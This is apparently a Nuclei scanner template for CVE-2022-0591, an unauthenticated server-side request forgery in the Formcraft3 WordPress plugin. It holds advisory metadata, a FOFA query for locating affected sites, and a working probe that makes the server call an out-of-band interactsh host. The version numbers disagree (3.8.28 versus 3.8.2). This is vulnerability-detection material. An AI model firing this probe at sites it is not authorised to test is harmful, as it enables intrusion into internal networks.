49 lines
1.8 KiB
YAML
49 lines
1.8 KiB
YAML
id: CVE-2022-0591
|
|
|
|
info:
|
|
name: Formcraft3 <3.8.28 - Server-Side Request Forgery
|
|
author: Akincibor,j4vaovo
|
|
severity: critical
|
|
description: |
|
|
Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.
|
|
impact: |
|
|
An attacker can send crafted requests to the server, potentially leading to unauthorized access to internal resources or network scanning.
|
|
remediation: |
|
|
Upgrade to Formcraft3 version 3.8.28 or later to fix the SSRF vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0591
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
|
|
cvss-score: 9.1
|
|
cve-id: CVE-2022-0591
|
|
cwe-id: CWE-918
|
|
epss-score: 0.03628
|
|
epss-percentile: 0.90752
|
|
cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: subtlewebinc
|
|
product: formcraft3
|
|
framework: wordpress
|
|
fofa-query: body="formcraft3" && body="wp-"
|
|
tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "User-Agent: WordPress"
|
|
# digest: 4a0a00473045022100c708c431ec5d2b81731b3953dfcc62383a2307ccb30d173ca97f8d7edf15751002204ec54e17fe7cf3b2819266bb0d392ed1a730195864610a4310116bcdc8c3091c:922c64590222798bb761d5b6d8e72950 |